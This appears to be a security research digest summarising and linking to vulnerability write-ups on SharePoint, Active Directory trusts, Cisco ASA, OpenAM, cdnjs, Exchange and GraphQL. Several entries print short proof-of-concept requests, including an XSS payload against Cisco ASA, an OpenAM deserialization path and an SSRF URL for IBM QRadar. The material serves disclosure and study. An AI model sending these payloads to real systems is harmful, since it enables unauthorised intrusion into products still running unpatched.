CVE-2021-31181: MicroSoft SharePoint webpart interpretation conflict RCE vulnerability

To quote @thezdi: "this vulnerability could be used by an authenticated user to execute arbitrary code on the server in the context of the service account of the SharePoint web application. For a successful attack, the attacker must have SPBasePermissions.ManageLists permissions on any SharePoint site. By default, any authenticated user can create their own site where they have the necessary permission."

Contents:
• The Vulnerability
• Proof of Concept
• Getting Remote Code Execution
• Conclusion

https://www.zerodayinitiative.com/blog/2021/6/1/cve-2021-31181-microsoft-sharepoint-webpart-interpretation-conflict-remote-code-execution-vulnerability

"Active Directory forest trusts part 2 - Trust transitivity and finding a trust bypass" by @_dirkjan.

Detailed description of CVE-2020-0665, a logic flaw, which allowed the bypassing of the SID filtering mechanism, leading to the compromise of hosts in transitively trusted forests.

Contents:
• Some important points
• Forging inter-realm tickets and Wireshark debugging
• Do you need to use inter-realm tickets?
• Which keys do I need for inter-realm tickets
• Debugging Kerberos the easy way
• Trust transitivity
• Trust transitivity - new domain discovery
• Trust transitivity, adding our own SIDs to the trust
• How many domains are there in a domain?
• Do you trust this domain? [Y/n]
• Designing a new forest trust attack
• Executing the forest trust bypass
• Obtaining the local SID
• Becoming a domain
• Executing the chain
• Disclosure and patch notes

https://dirkjanm.io/active-directory-forest-trusts-part-two-trust-transitivity/

LEXSS: Bypassing Lexical Parsing Security Controls
👤 by Chris Davis of @Bishop Fox

"By using special HTML tags that leverage HTML parsing logic, it is possible to achieve cross-site scripting (XSS) even in instances where lexical parsers are used to nullify dangerous content. The primary goal in exploiting these types of XSS vulnerabilities is to get the sanitizing lexical parser to view the data as text data and not computer instructions (e.g., JavaScript instructions)."

📝 Contents:
• Introduction to Key Concepts
• Cross-site Scripting (XSS) Protections
• Cross-site Scripting (XSS) Protections via Lexical Parsing
• How the Data Flows Through the HTML Parser
• The Concept of the HTML Parser's Context State
• Namespaces – Foreign Content and Leveraging the Unexpected Behavior
• Sanitizing Lexical Parsing Flow
• Test Case 1 = TinyMCE XSS
• Test Case 2 = Froala XSS
• Prevention
• Conclusion
• Resources

Read the article

PoC for XSS in Cisco ASA (CVE-2020-3580)

POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1
Host: ciscoASA.local
Content-Type: application/x-www-form-urlencoded
Content-Length: 44

SAMLResponse="><svg/onload=alert('PTSwarm')>

Pre-auth RCE in ForgeRock OpenAM (CVE-2021-35464)
👤 by Michael Stepankin aka @artsploit

The story of discovering and exploiting a java deserialization vulnerability leading to RCE in ForgeRock OpenAM.

PoC: GET /openam/oauth2/..;/ccversion/Version?jato.pageSession=[serialized_object]

📝 Contents:
• The Story
• Obtaining Code & Decompiling
• Source code analysis
• Jato
• Testing on bug bounty (and failing)
• Building a custom gadget chain
• Let's get this bread
• The patch
• Key takeaways

https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464

RARLAB fixed a MITM (CVE-2021-35052) in WinRAR found by our researcher Igor Sak-Sakovskiy.

This attack could be leveraged to achieve code execution on a user's machine.

Advisory: https://win-rar.com/singlenewsview.html?L=0&tx_ttnews%5Btt_news%5D=165&cHash=1

PoC for SSRF in IBM QRadar SIEM (CVE-2020-4786)

GET /console/chartServer?output=image&data=http://127.0.0.1:8080

CVE-2021-28474: SHAREPOINT RCE VIA SERVER-SIDE CONTROL INTERPRETATION CONFLICT
👤 by @thezdi

The vulnerability allows authenticated users to execute arbitrary .NET code on the server in the context of the service account of the SharePoint web application. By default, authenticated SharePoint users have all necessary permissions.

📝 Contents:
• The Vulnerability
• Exploitation
• Proof of Concept
• Getting Remote Code Execution
• Conclusion

https://www.zerodayinitiative.com/blog/2021/7/7/cve-2021-28474-sharepoint-remote-code-execution-via-server-side-control-interpretation-conflict

Remote code execution in cdnjs of Cloudflare
👤 by @ryotkak

A path traversal in Cloudfare's cdnjs library update server during archive extraction could be used to execute arbitrary commands, and as a result, cdnjs could be completely compromised, affecting around 12.7% of all websites on the internet once caches are expired.

📝 Contents:
• Preface
• TL;DR
• About cdnjs
• Reason for investigation
• Initial investigation
• Investigation of automatic update
• Path traversal
• Demonstration of vulnerability
• Incident
• Determinate impact
• Conclusion
• Timeline

https://blog.ryotak.me/post/cdnjs-remote-code-execution-en/

PoC for a boolean-based SQLi in Rapid7 Nexpose <= 6.6.48 (CVE-2020-7383)

https://nexpose.local:3780/data/discoveryAsset/config/folderPath?path=[sqli]

Sequoia: A Local Privilege Escalation Vulnerability in Linux’s Filesystem Layer (CVE-2021-33909)
👤 by Bharat Jogi

"The Qualys Research Team has discovered a size_t-to-int type conversion vulnerability in the Linux Kernel’s filesystem layer affecting most Linux operating systems. Any unprivileged user can gain root privileges on a vulnerable host by exploiting this vulnerability in a default configuration."

📝 Contents:
• About Linux Filesystem
• Impact
• Disclosure Timeline
• Proof of Concept Video
• Technical Details
• Solution
• Qualys Coverage
• Dashboard
• Vendor References
• Frequently Asked Questions (FAQs)

https://blog.qualys.com/vulnerabilities-threat-research/2021/07/20/sequoia-a-local-privilege-escalation-vulnerability-in-linuxs-filesystem-layer-cve-2021-33909

Cisco fixed a Post-Auth RCE (CVE-2021-1518) in Firepower Device Manager found by our researchers Nikita Abramov and Mikhail Klyuchnikov.

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-fdm-rce-Rx6vVurq

You should turn off autofill in your password manager
👤 by @marektoth

11 of the 16 tested browser and password manager combinations, using default configurations and adhering to best-practices, could be compromised in one mouse click by the user, allowing attackers access to plain-text saved login credentials.

📝 Contents:
• Autofill
• Autofill in chromium-based browsers
• Abuse of the autofill? Cross-Site Scripting (XSS)
• Analysis of browsers and password managers
• Limitation
• Script and demo
• Clickjacking KeePassXC-Browser
• Potential risks for users
• Potential risks for companies / Recommendation for InfoSec
• Recommendation
• Conclusion

https://marektoth.com/blog/password-managers-autofill/

NTLM relaying to AD CS - On certificates, printers and a little hippo
👤 by @_dirkjan

More Active Directory NTLM relaying wizardry from Dirk-jan, this time aggregating and unifying multiple different tools and techniques, culminating in the release of PKINITtools.

📝 Contents:
• Background - the state of NTLM relaying
• Exploring AD CS relaying
• Abusing the obtained certificate - diving into PKINIT
• Obtaining the NT hash of the impersonated computer account
• Using S4U2Self to obtain access to the relayed machine
• Other abuse avenues of PetitPotam
• Defenses
• Credits / Thanks / Tools

https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/

✍️We would like to share with the community some uncommon but not unique cases from our experience. Let us know if you like this format.

✅Stored XSS using .xbl files.

SAML is insecure by design
👤 by @joonas_fi

"In summary: once you base your security on some computed property, you can now exploit any flaws, differences or ambiguity in this computation. The more complex the computation is, the more dangerous it gets."

📝 Contents:
• What is SAML?
• Why should I care?
• Why is SAML insecure?
• Why is signing computed values dangerous?
• The SAML vulnerability in practice
• Why is SAML this way?
• Vulnerability mitigation
• How could SAML have been designed better?
• More SAML weirdness
• Why is SAML used if it sucks?
• Action
• Ignorance is bliss
• Additional reading

https://joonas.fi/2021/08/saml-is-insecure-by-design/

Site-wide CSRF using the GraphQL API

MyBB fixed a Persistent XSS (CVE-2021-27279) in MyBB < 1.8.25 found by our researcher Igor Sak-Sakovskiy.

RCE is possible when chained with CVE-2021-27890, reported by Simon Scannell & Carl Smith.

Advisory: https://mybb.com/versions/1.8.25/

🙈🙉🙊Citrix has removed the acknowledgement of our researcher Mikhail Klyuchnikov who discovered and reported CVE-2019-19781 - the Citrix ADC RCE!

Current: https://support.citrix.com/article/CTX267027

Mar 2021: http://web.archive.org/web/20210321090412/https://support.citrix.com/article/CTX267027

PROXYTOKEN: AN AUTHENTICATION BYPASS IN MICROSOFT EXCHANGE SERVER
👤 by Simon Zuckerbraun

With this vulnerability, an unauthenticated attacker can perform configuration actions on mailboxes belonging to arbitrary users, for example copying all emails addressed to a target account and forwarding them to an attacker-controlled account. The vulnerability arises due to the authentication module not being loaded on the back end.

📝 Contents:
• The Trigger
• Understanding the Root Cause
• Bagging a Canary
• Conclusion

https://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-microsoft-exchange-server

Exploiting GraphQL
👤 by @infosec_au

Overview of GraphQL attacks.

📝 Contents:
• Intro
• BatchQL
• Introspection
• Suggestions
• CSRF
• JSON list based batching
• Query name based batching
• Conclusion

https://blog.assetnote.io/2021/08/29/exploiting-graphql/